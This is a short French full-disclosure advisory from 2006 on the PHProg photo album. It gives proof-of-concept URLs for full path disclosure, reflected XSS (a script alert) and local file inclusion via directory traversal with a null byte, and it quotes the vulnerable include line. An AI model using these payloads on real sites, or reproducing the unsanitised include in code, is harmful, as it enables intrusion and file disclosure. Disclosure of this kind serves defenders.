Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14220
HistorySep 11, 2006 - 12:00 a.m.

[Full-disclosure] PHProg : Local File Inclusion + XSS + Full path disclosure

2006-09-1100:00:00
vulners.com
10

(11/09/06)

  • Produit vulnerable : PHProg ( Album photo en PHP )

  • Site officiel du produit : http://www.PHProg.com/

  • Failles de securite decelees :

1] Full path disclosure : http://localhost/PHProg/?id=1&album=cdg393

2] Cross Site Scripting ( XSS ) : http://localhost/PHProg/?id=1&album=
<script>alert('cdg393')</script>

3] Local File Inclusion :
http://localhost/PHProg/index.php?lang=../../../../../../BOOT.INI&#37;00

 Ligne 59        =&gt;              $lang=$_GET[&#39;lang&#39;];
 Ligne 61        =&gt;              include&#40;&quot;lang/$lang.php&quot;&#41;;